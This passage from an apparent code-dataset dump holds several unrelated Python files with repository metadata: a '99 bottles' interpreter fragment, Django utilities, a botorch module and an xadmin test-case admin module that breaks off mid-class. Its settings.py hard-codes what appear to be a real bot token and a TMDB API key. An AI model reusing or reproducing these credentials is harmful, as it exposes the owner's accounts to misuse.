on the wall.\n49 bottles of beer on the wall, 49 bottles of beer.\nTake one down and pass it around, 48 bottles of beer on the wall.\n48 bottles of beer on the wall, 48 bottles of beer.\nTake one down and pass it around, 47 bottles of beer on the wall.\n47 bottles of beer on the wall, 47 bottles of beer.\nTake one down and pass it around, 46 bottles of beer on the wall.\n46 bottles of beer on the wall, 46 bottles of beer.\nTake one down and pass it around, 45 bottles of beer on the wall.\n45 bottles of beer on the wall, 45 bottles of beer.\nTake one down and pass it around, 44 bottles of beer on the wall.\n44 bottles of beer on the wall, 44 bottles of beer.\nTake one down and pass it around, 43 bottles of beer on the wall.\n43 bottles of beer on the wall, 43 bottles of beer.\nTake one down and pass it around, 42 bottles of beer on the wall.\n42 bottles of beer on the wall, 42 bottles of beer.\nTake one down and pass it around, 41 bottles of beer on the wall.\n41 bottles of beer on the wall, 41 bottles of beer.\nTake one down and pass it around, 40 bottles of beer on the wall.\n40 bottles of beer on the wall, 40 bottles of beer.\nTake one down and pass it around, 39 bottles of beer on the wall.\n39 bottles of beer on the wall, 39 bottles of beer.\nTake one down and pass it around, 38 bottles of beer on the wall.\n38 bottles of beer on the wall, 38 bottles of beer.\nTake one down and pass it around, 37 bottles of beer on the wall.\n37 bottles of beer on the wall, 37 bottles of beer.\nTake one down and pass it around, 36 bottles of beer on the wall.\n36 bottles of beer on the wall, 36 bottles of beer.\nTake one down and pass it around, 35 bottles of beer on the wall.\n35 bottles of beer on the wall, 35 bottles of beer.\nTake one down and pass it around, 34 bottles of beer on the wall.\n34 bottles of beer on the wall, 34 bottles of beer.\nTake one down and pass it around, 33 bottles of beer on the wall.\n33 bottles of beer on the wall, 33 bottles of beer.\nTake one 
down and pass it around, 32 bottles of beer on the wall.\n32 bottles of beer on the wall, 32 bottles of beer.\nTake one down and pass it around, 31 bottles of beer on the wall.\n31 bottles of beer on the wall, 31 bottles of beer.\nTake one down and pass it around, 30 bottles of beer on the wall.\n30 bottles of beer on the wall, 30 bottles of beer.\nTake one down and pass it around, 29 bottles of beer on the wall.\n29 bottles of beer on the wall, 29 bottles of beer.\nTake one down and pass it around, 28 bottles of beer on the wall.\n28 bottles of beer on the wall, 28 bottles of beer.\nTake one down and pass it around, 27 bottles of beer on the wall.\n27 bottles of beer on the wall, 27 bottles of beer.\nTake one down and pass it around, 26 bottles of beer on the wall.\n26 bottles of beer on the wall, 26 bottles of beer.\nTake one down and pass it around, 25 bottles of beer on the wall.\n25 bottles of beer on the wall, 25 bottles of beer.\nTake one down and pass it around, 24 bottles of beer on the wall.\n24 bottles of beer on the wall, 24 bottles of beer.\nTake one down and pass it around, 23 bottles of beer on the wall.\n23 bottles of beer on the wall, 23 bottles of beer.\nTake one down and pass it around, 22 bottles of beer on the wall.\n22 bottles of beer on the wall, 22 bottles of beer.\nTake one down and pass it around, 21 bottles of beer on the wall.\n21 bottles of beer on the wall, 21 bottles of beer.\nTake one down and pass it around, 20 bottles of beer on the wall.\n20 bottles of beer on the wall, 20 bottles of beer.\nTake one down and pass it around, 19 bottles of beer on the wall.\n19 bottles of beer on the wall, 19 bottles of beer.\nTake one down and pass it around, 18 bottles of beer on the wall.\n18 bottles of beer on the wall, 18 bottles of beer.\nTake one down and pass it around, 17 bottles of beer on the wall.\n17 bottles of beer on the wall, 17 bottles of beer.\nTake one down and pass it around, 16 bottles of beer on the wall.\n16 bottles of beer on 
the wall, 16 bottles of beer.\nTake one down and pass it around, 15 bottles of beer on the wall.\n15 bottles of beer on the wall, 15 bottles of beer.\nTake one down and pass it around, 14 bottles of beer on the wall.\n14 bottles of beer on the wall, 14 bottles of beer.\nTake one down and pass it around, 13 bottles of beer on the wall.\n13 bottles of beer on the wall, 13 bottles of beer.\nTake one down and pass it around, 12 bottles of beer on the wall.\n12 bottles of beer on the wall, 12 bottles of beer.\nTake one down and pass it around, 11 bottles of beer on the wall.\n11 bottles of beer on the wall, 11 bottles of beer.\nTake one down and pass it around, 10 bottles of beer on the wall.\n10 bottles of beer on the wall, 10 bottles of beer.\nTake one down and pass it around, 9 bottles of beer on the wall.\n9 bottles of beer on the wall, 9 bottles of beer.\nTake one down and pass it around, 8 bottles of beer on the wall.\n8 bottles of beer on the wall, 8 bottles of beer.\nTake one down and pass it around, 7 bottles of beer on the wall.\n7 bottles of beer on the wall, 7 bottles of beer.\nTake one down and pass it around, 6 bottles of beer on the wall.\n6 bottles of beer on the wall, 6 bottles of beer.\nTake one down and pass it around, 5 bottles of beer on the wall.\n5 bottles of beer on the wall, 5 bottles of beer.\nTake one down and pass it around, 4 bottles of beer on the wall.\n4 bottles of beer on the wall, 4 bottles of beer.\nTake one down and pass it around, 3 bottles of beer on the wall.\n3 bottles of beer on the wall, 3 bottles of beer.\nTake one down and pass it around, 2 bottles of beer on the wall.\n2 bottles of beer on the wall, 2 bottles of beer.\nTake one down and pass it around, 1 bottle of beer on the wall.\n1 bottle of beer on the wall, 1 bottle of beer.\nTake one down and pass it around, no more bottles of beer on the wall.\nNo more bottles of beer on the wall, no more bottles of beer.\nGo to the store and buy some more, 99 bottles of beer on the 
wall."
if "H" in code:
return "Hello World!"
if "Q" in code:
return code
else: return None | [
"[email protected]"
] | |
0dad5e1d305a873fa56187c074313e2abafcd989 | a57a79bd2cb2397c6d879751e7041e9142390acc | /apps/tags/management/commands/migrate_tags.py | ba82af97368ac66dbcffd52844782f5c57617454 | [] | no_license | cephey/country | b41e85bfd5df20caec5d6f54b409ffe4f1b11ac3 | 774800e79417122876119246bb5b6e9b2e186891 | refs/heads/master | 2021-01-22T23:15:46.934125 | 2017-09-10T21:53:16 | 2017-09-10T21:53:16 | 85,618,298 | 0 | 0 | null | 2017-05-11T11:34:16 | 2017-03-20T19:36:45 | Python | UTF-8 | Python | false | false | 911 | py | import csv
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from apps.tags.models import Tag
class Command(BaseCommand):
    """Bulk-import Tag rows from a CSV export.

    Column 0 of each row is the external id, column 7 the tag name.
    Every row is imported — the file is assumed to have no header line.
    """
    help = 'Migrate tags from csv'

    def add_arguments(self, parser):
        # Location of the CSV file to import.
        parser.add_argument('--path', help='/path/to/file.csv')

    def handle(self, *args, **kwargs):
        self.stdout.write('Start...')
        path = kwargs.get('path')
        if not path:
            raise CommandError('Path is required')
        # Encoding of legacy exports comes from project settings.
        with open(path, 'r', encoding=settings.MIGRATE_FILE_ENCODING) as csvfile:
            # Build unsaved Tag instances for every row, then insert them
            # with one query per 100 rows instead of one per tag.
            tags = [Tag(name=row[7], ext_id=row[0]) for row in csv.reader(csvfile)]
            Tag.objects.bulk_create(tags, batch_size=100)
        self.stdout.write('End...')
| [
"[email protected]"
] | |
65f5d2a5f15722582ddbc314d4a85e0b2b534645 | 99ea33e3b36d3da52d3817c28fd60696e4d36c91 | /config/settings.py | e7d355059e8274925475bf1ab8ef560a7afa450e | [] | no_license | ghostnoop/WhatToWatch-ml-telegram | 2628c97a62f24ac149f540386d0d14a2091d97d9 | da7bb1386dab789641d9245544e89cf5d983fb50 | refs/heads/main | 2023-03-09T07:15:15.707105 | 2021-02-22T19:00:13 | 2021-02-22T19:00:13 | 341,305,969 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | import tmdbsimple as tmdb
class BotSettings:
    """Static bot configuration.

    NOTE(review): live secrets are hard-coded in source here; they should be
    moved to environment variables / an untracked config file and these
    values revoked.
    """
    API_TOKEN = "1083477387:AAHtlo1ngC61ZFA8rVadPut15CUjX92h79U"  # bot API token (format suggests Telegram — confirm against consumer)
    ADMIN_ID = 153621836  # presumably the administrator's user id — verify against caller
    tmdb.API_KEY = 'ad11be6ccbdb27f9a1f4530c5848891f'  # side effect: configures tmdbsimple globally when this class body executes
| [
"[email protected]"
] | |
ed4170fd87c23a603adf961d9030d73d0b004cf1 | 2b1448085c5ad44e78772dde1dcc2fae9cc4c3cc | /botorch/sampling/__init__.py | d27b244ea432efe02fe8a14dadd028d62b99e381 | [
"MIT"
] | permissive | leelasd/botorch | 47fa0ff9c5f6c534ecfcba59f5b1bf52eea0d62e | c48bfc822940ee8a6e5e2604d4ff282033dbe892 | refs/heads/master | 2022-12-17T04:42:41.591444 | 2020-09-10T23:45:05 | 2020-09-10T23:46:41 | 294,561,185 | 1 | 0 | MIT | 2020-09-11T01:19:36 | 2020-09-11T01:19:35 | null | UTF-8 | Python | false | false | 806 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from botorch.sampling.pairwise_samplers import (
PairwiseIIDNormalSampler,
PairwiseMCSampler,
PairwiseSobolQMCNormalSampler,
)
from botorch.sampling.qmc import MultivariateNormalQMCEngine, NormalQMCEngine
from botorch.sampling.samplers import IIDNormalSampler, MCSampler, SobolQMCNormalSampler
from torch.quasirandom import SobolEngine
# Public API of the sampling package.
__all__ = [
    "IIDNormalSampler",
    "MCSampler",
    "MultivariateNormalQMCEngine",
    "NormalQMCEngine",
    "SobolEngine",
    "SobolQMCNormalSampler",
    "PairwiseIIDNormalSampler",
    "PairwiseMCSampler",
    "PairwiseSobolQMCNormalSampler",
]
| [
"[email protected]"
] | |
884dd2e27584897fc76bd41c4be519872d0ebcf0 | 07a42b46fe9f154c32c1cfe4e7ef878d5c653ae7 | /simple_skeleton/urls.py | 9d3acfd8f816549f4662656cda55eb48a7def3ea | [
"MIT"
] | permissive | Mamacitapunto/simple-django-skeleton | 0d2fe60616a2df7829f1fdf05b57754f464d6e9f | 0babb4aa6bfcf6b9a803caed3a4167cbf4d9113f | refs/heads/master | 2021-01-19T04:25:03.444748 | 2015-11-30T20:16:02 | 2015-11-30T20:16:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from django.conf.urls import include, url
from django.contrib import admin
from simple_skeleton.apps.core import views as core_views
# URL routing table: site root -> core home view; /admin/ -> Django admin.
urlpatterns = [
    url(r'^$', core_views.home, name='home'),
    url(r'^admin/', include(admin.site.urls)),
]
| [
"[email protected]"
] | |
46b616bb437858d13cdcf1b05ea6e7262bb7899c | 0a530e71f248f0f731c6a3f28f090d1bb26b55e3 | /apps/testdatas/adminx.py | 4b18c25724826878478f7f85cf1f487e75812bb2 | [] | no_license | wawj901124/fuwuqi | cca9935f7b110dfdf38c93d59602a596ecac0d58 | e388fd10cf4fdb889d6566b7a30702b7c7351750 | refs/heads/master | 2022-12-13T13:12:10.854319 | 2020-01-18T00:42:52 | 2020-01-18T00:42:52 | 209,901,486 | 0 | 0 | null | 2022-11-22T02:40:33 | 2019-09-21T00:23:51 | Python | UTF-8 | Python | false | false | 63,303 | py | import xadmin
from .models import ClickAndBack,User,NewAddAndCheck,SearchAndCheck,DeleteAndCheck,EditAndCheck
from .models import InputTapInputText,InputTapInputFile,InputTapInputDateTime,SelectTapSelectOption,AssertTipText
from .models import IframeBodyInputText
from .models import RadioAndReelectionLabel
from .models import SearchInputTapInputText,SearchSelectTapSelectOption
from .models import LoginAndCheck
class LoginAndCheckXadmin(object):
    """xadmin options for LoginAndCheck ("log in and verify") test cases.

    Configures the change-list page, tab-style inlines for related input and
    assertion rows, per-user data isolation, and an Excel import hook
    (``post``) enabled by the ``import_excel`` plugin flag.
    """

    # Every editable model field, in sheet/column order; reused for list_editable.
    all_zi_duan = ["id", "test_project", "test_module", "test_page",
                   "case_priority",
                   "test_case_title", "is_run_case",
                   "login_url",
                   "is_auto_input_code", "code_image_xpath",
                   "code_type", "code_input_ele_find",
                   "code_input_ele_find_value",
                   "login_button_ele_find",
                   "login_button_ele_find_value", "click_login_button_delay_time",
                   "case_counts", "write_user",
                   "add_time", "update_time"]
    # Columns shown on the change-list page.
    list_display = ["test_project", "test_module", "test_page",
                    "case_priority",
                    "test_case_title", "is_run_case",
                    "login_url",
                    "is_auto_input_code", "code_image_xpath",
                    "code_type", "code_input_ele_find",
                    "code_input_ele_find_value",
                    "login_button_ele_find",
                    "login_button_ele_find_value", "click_login_button_delay_time",
                    "case_counts",
                    "go_to"]
    # Sidebar filters.
    list_filter = ["test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case",
                   "write_user"]
    # Search box fields.
    search_fields = ["test_project", "test_module", "test_page",
                    "test_case_title"]
    model_icon = "fa fa-file-text"  # menu icon
    ordering = ["-add_time"]  # newest first
    # write_user / timestamps are maintained automatically, never hand-edited.
    readonly_fields = ["write_user", "add_time",
                       "update_time"]
    list_editable = all_zi_duan  # allow in-place editing on the list page
    refresh_times = [3, 5]  # optional auto-refresh intervals (seconds)
    list_per_page = 50  # default page size (xadmin default is 100)
    list_display_links = ["test_case_title", ]  # column that links to the edit page
    show_detail_fields = ["test_project", ]  # inline detail popup
    list_export = ('xls',)  # allowed export formats
    show_bookmarks = True  # enable the bookmark widget
    # Enables the custom Excel-import plugin (consumed by the plugin, see post()).
    import_excel = True

    class InputTapInputTextInline(object):
        # Related text-input rows, shown as a tab.
        model = InputTapInputText
        exclude = ["add_time", "update_time", "newaddandcheck", "editandcheck", "loginandcheck"]
        extra = 1
        style = 'tab'

    class AssertTipTextInline(object):
        # Related assertion rows, shown as a tab.
        model = AssertTipText
        exclude = ["add_time", "update_time", "newaddandcheck", "editandcheck", "loginandcheck"]
        extra = 1
        style = 'tab'

    inlines = [InputTapInputTextInline, AssertTipTextInline, ]

    def save_models(self):
        """Persist the object; stamp write_user for non-superusers."""
        obj = self.new_obj
        if self.request.user.is_superuser:  # superusers keep whatever author is set
            obj.save()
        else:  # everyone else is recorded as the author automatically
            user = User.objects.get(username=self.request.user)
            obj.write_user_id = user.id
            obj.save()

    def queryset(self):
        """Superusers see every row; other users only their own."""
        qs = super(LoginAndCheckXadmin, self).queryset()
        if self.request.user.is_superuser:
            return qs
        return qs.filter(write_user=self.request.user)

    def post(self, request, *args, **kwargs):
        """Handle an Excel upload from the import plugin, then delegate to xadmin.

        Each data row of the first sheet maps column-by-column (0..16) onto a
        LoginAndCheck record, following the field order of ``all_zi_duan``.
        BUGFIX: this previously instantiated ``NewAddAndCheck`` and wrote
        login-case columns into the wrong model; it now creates LoginAndCheck.
        """
        if 'excel' in request.FILES:
            excel_file = request.FILES.get('excel', '')
            import xlrd  # reading .xls requires formatting_info=True
            exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
                                           formatting_info=True)
            from .analyzexls import Analyzexls
            analyzexls = Analyzexls()
            all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
            i = 0
            if len(all_list_1[0]) == 17:  # expected column count for this sheet
                while i < len(all_list_1):
                    row = all_list_1[i]
                    loginandcheck = LoginAndCheck()
                    loginandcheck.test_project = row[0]  # project
                    loginandcheck.test_module = row[1]  # module
                    loginandcheck.test_page = row[2]  # page under test
                    # Map the human-readable priority label to its code.
                    if row[3] == u"冒烟用例":
                        loginandcheck.case_priority = "P0"
                    elif row[3] == u"系统的重要功能用例":
                        loginandcheck.case_priority = "P1"
                    elif row[3] == u"系统的一般功能用例":
                        loginandcheck.case_priority = "P2"
                    elif row[3] == u"极低级别的用例":
                        loginandcheck.case_priority = "P3"
                    loginandcheck.test_case_title = row[4]  # case title
                    loginandcheck.is_run_case = row[5]  # whether to run the case
                    loginandcheck.login_url = row[6]  # login page URL
                    loginandcheck.is_auto_input_code = row[7]  # auto-fill captcha?
                    loginandcheck.code_image_xpath = row[8]  # captcha image xpath
                    loginandcheck.code_type = row[9]  # captcha type
                    loginandcheck.code_input_ele_find = row[10]  # captcha input locator strategy
                    loginandcheck.code_input_ele_find_value = row[11]  # captcha input locator value
                    loginandcheck.login_button_ele_find = row[12]  # login button locator strategy
                    loginandcheck.login_button_ele_find_value = row[13]  # login button locator value
                    loginandcheck.click_login_button_delay_time = row[14]  # delay after clicking login
                    loginandcheck.case_counts = row[15]  # number of cases
                    if row[16] != None:  # author column, matched by username
                        users = User.objects.all()
                        for user in users:
                            if user.username == row[16]:
                                loginandcheck.write_user_id = user.id
                    loginandcheck.save()
                    i = i + 1
        # Always fall through to the normal xadmin POST handling.
        return super(LoginAndCheckXadmin, self).post(request, *args, **kwargs)
class ClickAndBackXAdmin(object):
    """xadmin options for ClickAndBack ("click and navigate back") test cases.

    Configures the change-list page, per-user data isolation, a filtered
    dependency picker, and an Excel import hook (``post``) enabled by the
    ``import_excel`` plugin flag.
    """

    # Every editable model field, in sheet/column order; reused for list_editable.
    all_zi_duan = ["id", "test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case",
                   "is_static_load_page_time",
                   "current_page_click_ele_find", "current_page_click_ele_find_value",
                   "is_new",
                   "next_page_check_ele_find", "next_page_check_ele_find_value",
                   "case_counts", "depend_case", "write_user",
                   "add_time", "update_time"]
    # Columns shown on the change-list page.
    list_display = ["test_project", "test_module", "test_page",
                    "test_case_title", "is_run_case",
                    "is_static_load_page_time",
                    "current_page_click_ele_find", "current_page_click_ele_find_value",
                    "is_new",
                    "next_page_check_ele_find", "next_page_check_ele_find_value",
                    "case_counts", "depend_case",
                    "go_to"]
    # Sidebar filters.
    list_filter = ["test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case", "is_new",
                   "write_user"]
    # Search box fields.
    search_fields = ["test_project", "test_module", "test_page",
                     "test_case_title"]
    model_icon = "fa fa-file-text"  # menu icon
    ordering = ["-add_time"]  # newest first
    # write_user / timestamps are maintained automatically, never hand-edited.
    readonly_fields = ["write_user", "add_time", "update_time"]
    list_editable = all_zi_duan  # allow in-place editing on the list page
    refresh_times = [3, 5]  # optional auto-refresh intervals (seconds)
    list_per_page = 50  # default page size (xadmin default is 100)
    list_display_links = ["test_case_title", ]  # column that links to the edit page
    show_detail_fields = ["test_project", ]  # inline detail popup
    list_export = ('xls',)  # allowed export formats
    show_bookmarks = True  # enable the bookmark widget
    # Enables the custom Excel-import plugin (consumed by the plugin, see post()).
    import_excel = True

    def get_context(self):
        """Limit the depend_case dropdown to cases the current user may see."""
        context = super(ClickAndBackXAdmin, self).get_context()
        if 'form' in context:
            if self.request.user.is_superuser:  # superusers can depend on any case
                context['form'].fields['depend_case'].queryset = ClickAndBack.objects.all()
            else:  # others only on their own cases
                context['form'].fields['depend_case'].queryset = ClickAndBack.objects.filter(
                    write_user=self.request.user)
        return context

    def save_models(self):
        """Persist the object; stamp write_user for non-superusers."""
        obj = self.new_obj
        if self.request.user.is_superuser:  # superusers keep whatever author is set
            obj.save()
        else:  # everyone else is recorded as the author automatically
            user = User.objects.get(username=self.request.user)
            obj.write_user_id = user.id
            obj.save()

    def queryset(self):
        """Superusers see every row; other users only their own."""
        qs = super(ClickAndBackXAdmin, self).queryset()
        if self.request.user.is_superuser:
            return qs
        return qs.filter(write_user=self.request.user)

    def post(self, request, *args, **kwargs):
        """Handle an Excel upload from the import plugin, then delegate to xadmin.

        Each data row of the first sheet maps column-by-column (0..13) onto a
        ClickAndBack record, following the field order of ``all_zi_duan``.
        BUGFIX: ``next_page_check_ele_find`` previously read column 8 (the
        ``is_new`` column) instead of column 9, silently skipping a column.
        """
        if 'excel' in request.FILES:
            excel_file = request.FILES.get('excel', '')
            import xlrd  # reading .xls requires formatting_info=True
            exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
                                           formatting_info=True)
            from .analyzexls import Analyzexls
            analyzexls = Analyzexls()
            all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
            i = 0
            if len(all_list_1[0]) == 14:  # expected column count for this sheet
                while i < len(all_list_1):
                    row = all_list_1[i]
                    clickandback = ClickAndBack()
                    clickandback.test_project = row[0]  # project
                    clickandback.test_module = row[1]  # module
                    clickandback.test_page = row[2]  # page under test
                    clickandback.test_case_title = row[3]  # case title
                    clickandback.is_run_case = row[4]  # whether to run the case
                    clickandback.is_static_load_page_time = row[5]  # measure page-load time?
                    clickandback.current_page_click_ele_find = row[6]  # click target locator strategy
                    clickandback.current_page_click_ele_find_value = row[7]  # click target locator value
                    clickandback.is_new = row[8]  # opens in a new window?
                    clickandback.next_page_check_ele_find = row[9]  # next-page check locator strategy (was [8] — bugfix)
                    clickandback.next_page_check_ele_find_value = row[10]  # next-page check locator value
                    clickandback.case_counts = row[11]  # number of cases
                    if row[12] != None:  # optional dependency, matched by unique title
                        depend = row[12]
                        depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
                        depend_count = depend_contents.count()
                        if depend_count == 1:
                            for depend_content in depend_contents:
                                clickandback.depend_case_id = depend_content.id
                    if row[13] != None:  # author column, matched by username
                        users = User.objects.all()
                        for user in users:
                            if user.username == row[13]:
                                clickandback.write_user_id = user.id
                    clickandback.save()
                    i = i + 1
        # Always fall through to the normal xadmin POST handling.
        return super(ClickAndBackXAdmin, self).post(request, *args, **kwargs)
class NewAddAndCheckXadmin(object):
    """xadmin options for NewAddAndCheck ("create a record and verify it") test cases.

    Configures the change-list page, seven tab-style inlines for related
    form-field rows, per-user data isolation, a filtered dependency picker,
    and an Excel import hook (``post``) enabled by ``import_excel``.
    """
    # Every editable model field; reused below for list_editable.
    all_zi_duan = ["id", "test_project", "test_module", "test_page",
                   "case_priority",
                   "test_case_title", "is_run_case",
                   # "depend_new_add_and_check_case",
                   "depend_click_case","confirm_ele_find",
                   "confirm_ele_find_value",
                   "click_confirm_delay_time",
                   "is_click_cancel",
                   "cancel_ele_find","cancel_ele_find_value",
                   "is_submit_success",
                   "is_signel_page","page_number_xpath",
                   "result_table_ele_find","result_table_ele_find_value",
                   "table_colnum_counts",
                   "case_counts", "write_user",
                   "add_time", "update_time"]
    list_display = ["test_project", "test_module", "test_page",
                    "case_priority",
                    "test_case_title", "is_run_case",
                    # "depend_new_add_and_check_case",
                    "depend_click_case", "confirm_ele_find",
                    "confirm_ele_find_value",
                    "click_confirm_delay_time",
                    "is_click_cancel",
                    "cancel_ele_find", "cancel_ele_find_value",
                    "is_submit_success",
                    "is_signel_page", "page_number_xpath",
                    "result_table_ele_find", "result_table_ele_find_value",
                    "table_colnum_counts",
                    "case_counts",
                    "go_to_with_relevance"]  # columns shown on the change-list page
    list_filter = ["test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case",
                   "write_user"]  # sidebar filters
    search_fields = ["test_project", "test_module", "test_page",
                    "test_case_title"]  # search box fields
    model_icon = "fa fa-file-text"  # menu icon
    ordering = ["-add_time"]  # newest first
    # Author / timestamps are maintained automatically; readonly_fields wins
    # over exclude for the same field.
    readonly_fields = ["write_user", "add_time",
                       "update_time"]
    # exclude = ['case_step']  # hiding fields conflicts with readonly_fields
    # inlines: only one level of nesting is supported by xadmin
    list_editable = all_zi_duan  # allow in-place editing on the list page
    refresh_times = [3, 5]  # optional auto-refresh intervals (seconds)
    list_per_page = 50  # default page size (xadmin default is 100)
    # fk_fields = ['test_project_id',]  # attempted FK display — had no effect
    list_display_links = ["test_case_title", ]  # column that links to the edit page
    # date_hierarchy = 'add_time'  # attempted date drill-down — had no effect
    show_detail_fields = ["test_project", ]  # inline detail popup
    list_export = ('xls',)  # allowed export formats
    show_bookmarks = True  # enable the bookmark widget
    # Enables the custom Excel-import plugin (consumed by the plugin, see post()).
    import_excel = True

    # Related form-field rows, each shown as a tab on the edit page.
    class InputTapInputTextInline(object):
        model = InputTapInputText
        exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
        extra = 1
        style = 'tab'  # render as a tab

    class InputTapInputFileInline(object):
        model = InputTapInputFile
        exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
        extra = 1
        style = 'tab'  # render as a tab

    class InputTapInputDateTimeInline(object):
        model = InputTapInputDateTime
        exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
        extra = 1
        style = 'tab'  # render as a tab

    class RadioAndReelectionLabelInline(object):
        model = RadioAndReelectionLabel
        exclude = ["add_time", "update_time","newaddandcheck","editandcheck",]
        extra = 1
        style = 'tab'  # render as a tab

    class SelectTapSelectOptionInline(object):
        model = SelectTapSelectOption
        exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
        extra = 1
        style = 'tab'  # render as a tab

    class AssertTipTextInline(object):
        model = AssertTipText
        exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
        extra = 1
        style = 'tab'  # render as a tab

    class IframeBodyInputTextInline(object):
        model = IframeBodyInputText
        exclude = ["add_time","update_time","newaddandcheck","editandcheck",]
        extra = 1
        style = 'tab'  # render as a tab

    inlines = [InputTapInputTextInline,InputTapInputFileInline,InputTapInputDateTimeInline,
               RadioAndReelectionLabelInline,
               SelectTapSelectOptionInline,AssertTipTextInline,
               IframeBodyInputTextInline,]

    def get_context(self):
        """Limit the depend_click_case dropdown to cases the current user may see."""
        context = super(NewAddAndCheckXadmin, self).get_context()
        if 'form' in context:
            if self.request.user.is_superuser:  # superusers can depend on any click case
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
            else:  # others only on their own click cases
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user)
        return context

    def save_models(self):
        """Persist the object; stamp write_user for non-superusers."""
        obj = self.new_obj
        if self.request.user.is_superuser:  # superusers keep whatever author is set
            obj.save()
        else:  # everyone else is recorded as the author automatically
            user = User.objects.get(username=self.request.user)
            obj.write_user_id = user.id
            obj.save()

    def queryset(self):
        """Superusers see every row; other users only their own."""
        qs = super(NewAddAndCheckXadmin, self).queryset()
        if self.request.user.is_superuser:
            return qs
        else:
            qs = qs.filter(write_user=self.request.user)
        return qs

    def post(self, request, *args, **kwargs):
        """Handle an Excel upload from the import plugin, then delegate to xadmin.

        Each data row of the first sheet maps column-by-column (0..19) onto a
        NewAddAndCheck record.
        NOTE(review): ``click_confirm_delay_time`` is never populated from the
        sheet — confirm the 20-column layout intentionally omits it.
        """
        if 'excel' in request.FILES:
            excel_file = request.FILES.get('excel', '')
            import xlrd  # reading .xls requires formatting_info=True
            # .xlsx would be: xlrd.open_workbook(file_contents=...) without formatting_info
            exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
                                           formatting_info=True)  # .xls workbook
            from .analyzexls import Analyzexls
            analyzexls = Analyzexls()
            # Walk the parsed rows and load each one into the database.
            all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
            i = 0
            if len(all_list_1[0]) == 20:  # expected column count for this sheet
                while i < len(all_list_1):
                    newaddandcheck = NewAddAndCheck()  # one record per sheet row
                    newaddandcheck.test_project = all_list_1[i][0]  # project
                    newaddandcheck.test_module = all_list_1[i][1]  # module
                    newaddandcheck.test_page = all_list_1[i][2]  # page under test
                    # Map the human-readable priority label to its code.
                    if all_list_1[i][3] == u"冒烟用例":
                        newaddandcheck.case_priority = "P0"  # smoke test
                    elif all_list_1[i][3] == u"系统的重要功能用例":
                        newaddandcheck.case_priority = "P1"  # important feature
                    elif all_list_1[i][3] == u"系统的一般功能用例":
                        newaddandcheck.case_priority = "P2"  # ordinary feature
                    elif all_list_1[i][3] == u"极低级别的用例":
                        newaddandcheck.case_priority = "P3"  # very low priority
                    newaddandcheck.test_case_title = all_list_1[i][4]  # case title
                    newaddandcheck.is_run_case =all_list_1[i][5]  # whether to run the case
                    if all_list_1[i][6] != None:  # optional dependency, matched by unique title
                        depend = all_list_1[i][6]
                        depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
                        depend_count = depend_contents.count()
                        if depend_count == 1:
                            for depend_content in depend_contents:
                                newaddandcheck.depend_click_case_id = depend_content.id
                    newaddandcheck.confirm_ele_find = all_list_1[i][7]  # confirm button locator strategy
                    newaddandcheck.confirm_ele_find_value = all_list_1[i][8]  # confirm button locator value
                    newaddandcheck.is_click_cancel = all_list_1[i][9]  # click cancel button?
                    newaddandcheck.cancel_ele_find = all_list_1[i][10]  # cancel button locator strategy
                    newaddandcheck.cancel_ele_find_value = all_list_1[i][11]  # cancel button locator value
                    newaddandcheck.is_submit_success = all_list_1[i][12]  # expect submit to succeed?
                    newaddandcheck.is_signel_page = all_list_1[i][13]  # single-page result list?
                    newaddandcheck.page_number_xpath = all_list_1[i][14]  # pager xpath
                    newaddandcheck.result_table_ele_find = all_list_1[i][15]  # result table locator strategy
                    newaddandcheck.result_table_ele_find_value = all_list_1[i][16]  # result table locator value
                    newaddandcheck.table_colnum_counts = all_list_1[i][17]  # result table column count
                    newaddandcheck.case_counts = all_list_1[i][18]  # number of cases
                    if all_list_1[i][19] != None:  # author column, matched by username
                        users = User.objects.all()
                        for user in users:
                            if user.username == all_list_1[i][19]:
                                newaddandcheck.write_user_id = user.id
                    newaddandcheck.save()  # persist the row
                    i = i + 1
            pass
        # Always fall through to the normal xadmin POST handling; forgetting
        # this breaks every save through this admin class.
        return super(NewAddAndCheckXadmin,self).post(request,*args,**kwargs)
class SearchAndCheckXadmin(object):
    """xadmin options for SearchAndCheck test cases (search a page, then
    verify the result table)."""
    # All model fields; reused below so that every column is editable on the list page.
    all_zi_duan = ["id", "test_project", "test_module", "test_page",
                   "case_priority",
                   "test_case_title", "is_run_case",
                   "search_ele_find",
                   "search_ele_find_value",
                   "is_with_date",
                   "result_table_ele_find","result_table_ele_find_value",
                   "case_counts", "depend_click_case",
                   "write_user",
                   "add_time", "update_time"]
    list_display = ["test_project", "test_module", "test_page",
                    "case_priority",
                    "test_case_title", "is_run_case",
                    "search_ele_find",
                    "search_ele_find_value",
                    "is_with_date",
                    "result_table_ele_find", "result_table_ele_find_value",
                    "case_counts","depend_click_case",
                    "go_to_with_relevance"]  # columns shown on the list page
    list_filter = ["test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case",
                   "write_user"]  # fields offered as list-page filters
    search_fields = ["test_project", "test_module", "test_page",
                     "test_case_title"]  # fields covered by the search box
    model_icon = "fa fa-file-text"  # icon used for this model in the UI
    ordering = ["-add_time"]  # default ordering: newest first (by add_time)
    readonly_fields = ["write_user", "add_time",
